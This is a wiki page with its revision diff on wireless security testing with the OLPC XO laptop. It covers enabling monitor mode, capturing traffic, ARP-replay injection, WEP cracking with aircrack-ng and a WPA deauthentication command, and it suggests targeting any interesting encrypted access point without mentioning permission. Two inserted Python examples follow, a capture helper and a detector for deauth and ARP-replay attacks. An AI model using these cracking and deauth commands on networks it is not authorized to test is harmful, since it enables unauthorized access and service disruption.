Wireless network hacking: Difference between revisions
No edit summary | No edit summary
(15 intermediate revisions by 14 users not shown)
Line 4: | Line 4:
These instructions describe how to test wireless networks for security holes and how to use the various security softwares with the XO OLPC. However, great care should be taken in using these tools and software as they may brick your XO in the worst case or considerably bloat your configuration. (Especially when saving large data files...)
== XO-1.5 ==

For now, enabling monitor mode on newer XOs is not as simple as on the XO-1. For more information, see [[XO-1.5 Wireless Test Setup]] and [[XO-1.5 Wireless Test Report#Verify_monitor_interface]]
== Updating Your Software/Firmware ==
Line 15: | Line 18:
=== Check Wireless Firmware ===
Check that you have a recent version of the wireless firmware by following these instructions: http://wiki.laptop.org/go/Test_Config_Notes#Update_the_wireless_firmware
=== Check Software ===
== Install security related software ==
Line 37: | Line 38:
== Performing the Analysis ==

=== Find a target network ===

Press the Mesh button and inspect any interesting access point (AP). Any AP with a padlock on it is encrypted in one way or another. These are the ones suited for a WEP/WPA crack.
Line 42: | Line 44:
=== Collect Network data ===

Next we need to collect packet data. The way to do this is by enabling [[tcpdump]] or [[wireshark]]. However, because of some non standard wireless chipsets, we need to do the following:
Old revision:

[[Could someone confirm that this is necessary?]]

 ifconfig msh0 down
 ifconfig eth0 down
 killall NetworkManager

[[perhaps it would be more stylish to stop the service instead??:]]

monitor mode on the Marvell chipset:

 export TRAFFIC_MASK=0x7
 echo $TRAFFIC_MASK > /sys/class/net/eth0/device/libertas_rtap
 ifconfig rtap0 up

* note: it seems that on joyride 1772 the file is /sys/class/net/eth0/lbs_rtap and changing the TRAFFIC_MASK to 0x0 sets it back to normal mode from monitor mode.

Start dumping the data:

[[There is another version of this in the wireshark manual with "s 1500" instead...]]

 tcpdump -s 128 -i rtap0 -w datadump.cap

Or use airodump, part of the aircrack-ng package in the olpc repository

 airodump-ng --write [dumpfile] rtap0

Then we need to restore everything for normal operation

 ifconfig rtap0 down
 /sbin/service NetworkManager start
 ifconfig msh0 up
 ifconfig eth0 up

* remember to echo 0x0 to your /sys/class/net/eth0/lbs_rtap file to disable monitor mode

However this is not at all obvious to what all this means, and in addition it is a great risk that you crash your XO. So rather use [[this]] script, like this: [[still to do]]

 su
 wget http://..../capture.sh
 chmod +x capture.sh
 ./capture.sh

=== Generate extra packets ===

By using aireplay-ng, we can generate extra packets in a short time, by injecting bogous ARP requests. In this examples we will use: 00:11:22:33:44:55 AP 00:66:77:88:99:AA client. The command is something like:

 aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:66:77:88:99:AA eth0

=== Cracking a WEP key ===

Follow the instructions at this page: http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks

TODO: [[We should write a short distillation of that wiki here.]]

==== Using aircrack-ng: ====

 aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:66:77:88:99:AA eth0

Start another console session and enter:

 aircrack-ng -z -b 00:11:22:33:44:55 output*.cap

[[using the PTW WEP-cracking method]]

 aircrack-ng -b 00:11:22:33:44:55 output*.cap

[[using the FMS/Korek method]]

Using the FMS/Korek method you will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128bit keys. Using the PTW method, 40-bit WEP can be cracked with as few as 20,000 data packets and 104-bit WEP with 40,000 data packets.

=== Cracking a WPA key ===

Execute the following command in the terminal application while there is a client succesfully connected to the wireless access point:

 aireplay -0 5 -a <AP MAC> -c <Client MAC> ath0

=== Cracking a MESH network ===

[[to do]]

New revision:

 /sbin/service NetworkManager stop # This service can interfere with monitoring
 echo 0x7 > /sys/class/net/eth0/device/net/eth0/lbs_rtap # Enable monitor mode
 ifconfig rtap0 up # Bring up the monitor interface

The location of your sys file may be different. You can find it with: <code>find /sys/class -name '*rtap*'</code>

Start dumping the data:

 tcpdump -s 128 -i rtap0 -w datadump.cap

Or use airodump, part of the aircrack-ng package in the olpc repository

 airodump-ng --write [dumpfile] rtap0

Then we need to restore everything for normal operation:

 ifconfig rtap0 down
 echo 0x0 > /sys/class/net/eth0/device/net/eth0/lbs_rtap

=== Generate extra packets ===

By using aireplay-ng, we can generate extra packets in a short time, by injecting bogus ARP requests. In this examples we will use: 00:11:22:33:44:55 AP 00:66:77:88:99:AA client. The command is something like:

 aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:66:77:88:99:AA eth0

=== Cracking a WEP key ===

Follow the instructions at this page: http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks

TODO: [[We should write a short distillation of that wiki here.]]

==== Using aircrack-ng: ====

 aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:66:77:88:99:AA eth0

Start another console session and enter:

 aircrack-ng -z -b 00:11:22:33:44:55 output*.cap

[[using the PTW WEP-cracking method]]

 aircrack-ng -b 00:11:22:33:44:55 output*.cap

[[using the FMS/Korek method]]

Using the FMS/Korek method you will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128bit keys. Using the PTW method, 40-bit WEP can be cracked with as few as 20,000 data packets and 104-bit WEP with 40,000 data packets.

=== Cracking a WPA key ===

Execute the following command in the terminal application while there is a client successfully connected to the wireless access point:

 aireplay -0 5 -a <AP MAC> -c <Client MAC> ath0

oxygen-00173

=== Cracking a MESH network ===

[[to do]]

== Airtime analysis ==
Line 66: | Line 97:
http://wiki.laptop.org/go/88W8388

http://wiki.laptop.org/go/Wireless#Capturing_wireless_traffic_on_the_xo
Old revision: http://dev.laptop.org/ticket/4805
New revision: {{Trac|4805}}
http://lists.infradead.org/pipermail/libertas-dev/2007-July/000607.html

http://lists.infradead.org/pipermail/libertas-dev/2007-December/001003.html
Line 76: | Line 107:
http://www.wireshark.org/

http://www.kismetwireless.net/
Old revision: http://www.
New revision: http://www.aircrack-ng.org/doku.php
http://www.nessus.org/nessus/

http://www.tcpdump.org/tcpdump_man.html
Old revision: http://www.
New revision: http://www.freebsd.org/cgi/man.cgi?query=traceroute
Old revision: To check what's
New revision: To check what's in the default installation:
http://dev.laptop.org/~bert/joyride-pkgs.html
New revision: [[Category:Network]]

[[Category:Security|Wireless network hacking]]
Latest revision as of 14:27, 3 November 2011
These instructions describe how to test wireless networks for security holes and how to use the various security tools on the XO OLPC. However, take great care when using these tools: in the worst case they may brick your XO, and they can considerably bloat your configuration (especially when saving large capture files).
== XO-1.5 ==

For now, enabling monitor mode on newer XOs is not as simple as on the XO-1. For more information, see XO-1.5 Wireless Test Setup and XO-1.5 Wireless Test Report#Verify_monitor_interface.
== Updating Your Software/Firmware ==

=== Check General Firmware ===

http://wiki.laptop.org/go/Firmware
http://wiki.laptop.org/go/Upgrading_the_firmware

=== Check Wireless Firmware ===

Check that you have a recent version of the wireless firmware by following these instructions: http://wiki.laptop.org/go/Test_Config_Notes#Update_the_wireless_firmware
== Install security related software ==

In order to continue we need some network tools:
- wireshark - the world's foremost network protocol analyzer (formerly known as Ethereal)
- kismet - an 802.11 layer-2 wireless network detector, sniffer, and intrusion detection system
- aircrack-ng - an 802.11 WEP/WPA-PSK key cracking program that can recover keys once enough data packets have been captured
- nessus - a well-known network vulnerability scanner
- bind-utils - a collection of utilities for querying name servers and looking up hosts
- traceroute - a network tool used to determine the route taken by packets across an IP network

We can install all of these in one go (in the terminal application):

 su
 yum install wireshark wireshark-gnome kismet aircrack-ng nessus bind-utils traceroute
== Configuration of Network Tools ==

== Performing the Analysis ==

=== Find a target network ===

Press the Mesh button and inspect any interesting access point (AP). Any AP shown with a padlock uses some form of encryption; these are the ones the WEP/WPA procedures below apply to.
=== Collect Network data ===

Next we need to collect packet data. The way to do this is by enabling tcpdump or wireshark. However, because of some non-standard wireless chipsets, we need to do the following:

 /sbin/service NetworkManager stop   # This service can interfere with monitoring
 echo 0x7 > /sys/class/net/eth0/device/net/eth0/lbs_rtap   # Enable monitor mode
 ifconfig rtap0 up   # Bring up the monitor interface

The location of your sys file may be different. You can find it with: find /sys/class -name '*rtap*'

Start dumping the data:

 tcpdump -s 128 -i rtap0 -w datadump.cap

Or use airodump, part of the aircrack-ng package in the olpc repository:

 airodump-ng --write [dumpfile] rtap0

Then we need to restore everything for normal operation:

 ifconfig rtap0 down
 echo 0x0 > /sys/class/net/eth0/device/net/eth0/lbs_rtap
 /sbin/service NetworkManager start
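The restore step above is easy to forget, and an earlier revision of this page left "a script" for it as a to-do. The following is an added example, not the wiki's own capture.sh: it wraps the page's sequence (stop NetworkManager, write 0x7 to the rtap control attribute, bring rtap0 up, run tcpdump, undo all of it) in a context manager so the 0x0 write can't be skipped, and it looks for the control attribute under both names the page mentions (lbs_rtap and libertas_rtap). The mask values and sysfs paths are the page's; the candidate-path list, the function names and the offline demo tree are assumptions made for this example.

```python
"""Monitor-mode capture helper for the XO-1 libertas driver (added example).

Mask values and sysfs locations come from the wiki page; everything else
(function names, candidate-path list, offline demo) is assumed for the example.
"""
import os
import subprocess
import sys

MONITOR_MASK = "0x7"  # value the page writes to enable monitor mode
NORMAL_MASK = "0x0"   # value the page writes to return to normal mode
# Both attribute names appear on the page (newer lbs_rtap, older libertas_rtap).
CANDIDATE_NAMES = ("lbs_rtap", "libertas_rtap")


def find_rtap_control(sysfs_root="/sys/class"):
    """The page's `find /sys/class -name '*rtap*'` hint as a fixed candidate
    list (assumed): returns the first existing control attribute or None."""
    net_dir = os.path.join(sysfs_root, "net")
    if not os.path.isdir(net_dir):
        return None
    for iface in sorted(os.listdir(net_dir)):
        iface_dir = os.path.join(net_dir, iface)
        for rel in (".", "device", os.path.join("device", "net", iface)):
            for name in CANDIDATE_NAMES:
                path = os.path.normpath(os.path.join(iface_dir, rel, name))
                if os.path.isfile(path):
                    return path
    return None


def write_mask(path, value):
    with open(path, "w") as f:
        f.write(value + "\n")


def read_mask(path):
    with open(path) as f:
        return f.read().strip()


class MonitorMode:
    """Monitor mask on entry, normal mask on exit: the restore runs whether
    the body returns, raises, or is interrupted with Ctrl-C."""

    def __init__(self, control_path):
        self.control_path = control_path

    def __enter__(self):
        write_mask(self.control_path, MONITOR_MASK)
        return self

    def __exit__(self, exc_type, exc, tb):
        write_mask(self.control_path, NORMAL_MASK)
        return False  # never swallow the exception


def run_capture(control_path, capture_cmd, run=subprocess.call):
    """Run capture_cmd (an argv list) inside monitor mode. `run` is injectable
    so the restore guarantee can be exercised without hardware."""
    with MonitorMode(control_path):
        return run(capture_cmd)


def main(argv):
    control = find_rtap_control()
    if control is None:
        print("no *rtap control attribute under /sys/class/net", file=sys.stderr)
        return 1
    out = argv[1] if len(argv) > 1 else "datadump.cap"
    subprocess.call(["/sbin/service", "NetworkManager", "stop"])
    try:
        with MonitorMode(control):
            subprocess.call(["ifconfig", "rtap0", "up"])
            try:  # same tcpdump invocation as the page; Ctrl-C ends the capture
                return run_capture(control, ["tcpdump", "-s", "128", "-i", "rtap0", "-w", out])
            finally:
                subprocess.call(["ifconfig", "rtap0", "down"])
    finally:
        subprocess.call(["/sbin/service", "NetworkManager", "start"])


def demo_offline():
    """Constructed check: a fake sysfs tree in a temp dir, a capture command
    that fails mid-way, and the mask observed during and after the run."""
    import tempfile
    with tempfile.TemporaryDirectory() as root:
        ctl_dir = os.path.join(root, "net", "eth0", "device", "net", "eth0")
        os.makedirs(ctl_dir)
        ctl = os.path.join(ctl_dir, "lbs_rtap")
        write_mask(ctl, NORMAL_MASK)
        seen = {"found": os.path.relpath(find_rtap_control(root), root)}

        def failing_capture(cmd):
            seen["during"] = read_mask(ctl)
            raise RuntimeError("simulated tcpdump failure")

        try:
            run_capture(ctl, ["tcpdump"], run=failing_capture)
        except RuntimeError:
            seen["raised"] = True
        seen["after"] = read_mask(ctl)
        return seen


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as root with an optional output file name (`python capture.py datadump.cap`); `demo_offline()` shows the point of the context manager without touching real hardware: even when the capture command fails, the attribute is back at 0x0 afterwards.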
=== Generate extra packets ===

By using aireplay-ng, we can generate extra packets in a short time by injecting bogus ARP requests. In this example we use 00:11:22:33:44:55 as the AP and 00:66:77:88:99:AA as the client. The command is something like:

 aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:66:77:88:99:AA eth0
=== Cracking a WEP key ===

Follow the instructions at this page: http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks

TODO: We should write a short distillation of that wiki here.

==== Using aircrack-ng: ====

 aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:66:77:88:99:AA eth0

Start another console session and enter one of the following:

 aircrack-ng -z -b 00:11:22:33:44:55 output*.cap   # using the PTW WEP-cracking method
 aircrack-ng -b 00:11:22:33:44:55 output*.cap      # using the FMS/Korek method

Using the FMS/Korek method you will need approximately 250,000 IVs for 64-bit and 1,500,000 IVs for 128-bit keys. Using the PTW method, 40-bit WEP can be cracked with as few as 20,000 data packets and 104-bit WEP with 40,000 data packets.
=== Cracking a WPA key ===

Execute the following command in the terminal application while there is a client successfully connected to the wireless access point:

 aireplay -0 5 -a <AP MAC> -c <Client MAC> ath0

oxygen-00173
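Both aireplay-ng modes on this page leave a distinctive signature in a monitor-mode capture: the `-3` mode under "Generate extra packets" retransmits one captured ARP request at a high rate from the client's MAC, and the `-0` mode above sends a burst of deauthentication frames between the AP and the client. The following is an added detection example, not part of the wiki page: it runs a sliding-window rate check over per-frame summary records and reports any (source, destination) pair exceeding a deauth rate and any (source, request) pair whose identical ARP request repeats too often. The record format, the thresholds and the sample traffic are constructed for the example; the MAC addresses are the page's own placeholders.

```python
"""Rate-based detection of deauth bursts and ARP-request replay (added example).

Input records are constructed 'ts,kind,src,dst,extra' lines, the kind of
summary a capture tool can export; thresholds are assumed and should be
tuned to the network being monitored.
"""
from collections import defaultdict, deque

DEAUTH_PER_SEC = 10       # assumed: more deauths than this per second is a flood
ARP_REPLAY_PER_SEC = 50   # assumed: identical ARP requests per second is replay
WINDOW_SECONDS = 1.0


def parse_records(lines):
    """Parse 'ts,kind,src,dst,extra' lines; '#' lines are comments."""
    recs = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, kind, src, dst, extra = line.split(",", 4)
        recs.append({"ts": float(ts), "kind": kind, "src": src.lower(),
                     "dst": dst.lower(), "extra": extra})
    return recs


def rate_alerts(recs, kind, key_fn, threshold, window=WINDOW_SECONDS):
    """Sliding window per key: alert when more than `threshold` frames of
    `kind` with the same key_fn(rec) fall inside `window` seconds.
    Returns {key: peak count} for keys that crossed the threshold."""
    windows = defaultdict(deque)
    alerts = {}
    for rec in recs:
        if rec["kind"] != kind:
            continue
        key = key_fn(rec)
        dq = windows[key]
        dq.append(rec["ts"])
        while dq and rec["ts"] - dq[0] > window:
            dq.popleft()
        if len(dq) > threshold:
            alerts[key] = max(alerts.get(key, 0), len(dq))
    return alerts


def detect(lines):
    recs = parse_records(lines)
    deauth = rate_alerts(recs, "deauth",
                         lambda r: (r["src"], r["dst"]), DEAUTH_PER_SEC)
    # An ARP replay repeats the *same* request, so key on source + request text.
    arp = rate_alerts(recs, "arp-request",
                      lambda r: (r["src"], r["extra"]), ARP_REPLAY_PER_SEC)
    return {"deauth_floods": deauth, "arp_replays": arp}


def constructed_sample():
    """Constructed traffic: benign background, then a replayed ARP request
    and a deauth burst using the page's placeholder MACs."""
    ap, client = "00:11:22:33:44:55", "00:66:77:88:99:aa"
    lines = ["# ts,kind,src,dst,extra  (constructed sample)"]
    for i in range(5):  # benign: distinct ARP requests spread over 10 s
        lines.append(f"{i * 2.0},arp-request,{client},ff:ff:ff:ff:ff:ff,"
                     f"who-has 192.168.1.{i + 1}")
    lines.append(f"11.0,deauth,{client},{ap},reason=3")  # benign: client leaves
    for i in range(120):  # replay: the same request 120 times in 0.6 s
        lines.append(f"{20.0 + i * 0.005},arp-request,{client},"
                     f"ff:ff:ff:ff:ff:ff,who-has 192.168.1.1")
    for i in range(128):  # burst: 128 deauth frames AP -> client in 0.5 s
        lines.append(f"{30.0 + i * 0.004},deauth,{ap},{client},reason=7")
    return lines


if __name__ == "__main__":
    for name, hits in detect(constructed_sample()).items():
        for key, peak in hits.items():
            print(f"{name}: {key} peak={peak} frames/{WINDOW_SECONDS:.0f}s")
```

The benign single deauth and the five distinct ARP requests never cross a threshold, while the two injected patterns are reported with their peak per-window count. Keying the ARP check on the request text rather than on the source alone is what separates replay from a busy but legitimate host.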
=== Cracking a MESH network ===

== Airtime analysis ==

For checking how much of the medium a given type of traffic is consuming, check this page

== For More Info ==
http://wiki.laptop.org/go/Wireless_Driver_README
http://wiki.laptop.org/go/88W8388
http://wiki.laptop.org/go/Wireless#Capturing_wireless_traffic_on_the_xo
(Trac #4805)
http://lists.infradead.org/pipermail/libertas-dev/2007-July/000607.html
http://lists.infradead.org/pipermail/libertas-dev/2007-December/001003.html
http://www.hpl.hp.com/personal/Jean_Tourrilhes/Linux/Linux.Wireless.drivers.802.11ag.html
http://www.olpcnews.com/forum/index.php?topic=814.msg13043;topicseen
References:

http://www.wireshark.org/
http://www.kismetwireless.net/
http://www.aircrack-ng.org/doku.php
http://www.nessus.org/nessus/
http://www.tcpdump.org/tcpdump_man.html
http://www.freebsd.org/cgi/man.cgi?query=traceroute

To check what's in the default installation: http://dev.laptop.org/~bert/joyride-pkgs.html